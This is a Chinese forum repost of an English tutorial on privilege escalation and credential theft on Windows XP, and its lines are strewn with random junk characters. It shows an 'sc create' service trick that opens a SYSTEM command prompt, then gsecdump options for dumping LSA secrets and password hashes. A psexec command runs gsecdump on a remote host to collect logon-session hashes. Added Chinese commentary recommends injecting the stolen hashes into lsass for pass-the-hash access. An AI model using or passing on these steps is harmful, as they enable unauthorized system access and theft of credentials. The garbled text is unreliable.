HASH注入式攻击

admin

o get a DOS Prompt as NT system:
5 Z: e6 Y' A1 }* G# a  y) r. e  n
" K. F8 P: z; `7 bC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

0 }- i' y* N) ?0 i+ s6 g" OC:\>sc start shellcmdline
1 [/ r- j2 P) O8 f8 |7 n6 H# ~: a[SC] StartService FAILED 1053:
  }7 `* o$ \( `) E$ Z  s2 h; K  m
) X4 j0 C) e- `6 QThe service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
! |' m6 p  v- L% v0 b4 V  Y7 F
Then in the new DOS window:
7 j1 H/ U6 i: ~( u3 \% h
Microsoft Windows XP [Version 5.1.2600]
* c+ s3 X6 S( E$ D; q) c+ A(C) Copyright 1985-2001 Microsoft Corp.

$ e; A8 k2 a7 u, X: [  q' [; a+ J  IC:\WINDOWS\system32>whoami
$ v( b) _6 q- l! G+ F8 mNT AUTHORITY\SYSTEM
5 t+ k, D3 W5 `- c- {6 [" B
+ t  T" n& X* l4 FC:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
usage: gsecdump [options]

1 @/ N+ A7 g- n8 h0 F$ o' A, j* Koptions:
-h [ --help ] show help
- f1 {# A' ]4 F' N: t2 ]) E* k% Z5 X-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
8 }( [& ]3 A' w* Y-w [ --dump_wireless ] dump microsoft wireless connections
& U3 h  n' ~5 k. a-u [ --dump_usedhashes ] dump hashes from active logon sessions
$ H5 M! I) z% _% Q1 D- u) y-s [ --dump_hashes ] dump hashes from SAM/AD

& u9 e9 v8 h  O: d, N2 f& ~9 {9 lAlthough I like to use:

) |" d* A! N2 \PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
$ z  Y/ K# L, P$ a2 d* V  [Sysinternals - 链接标记[url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
0 k# b' B- B- S/ e* U  U5 ^
to get the hashes from active logon sessions of a remote system.
9 x/ ]# j6 ^& H! q! F
# V$ v, \$ y& iThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
; [4 Q& j5 u' [( P/ p) r) n  {$ X
3 c' x- a0 [) {" U" k8 b5 {+ y我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。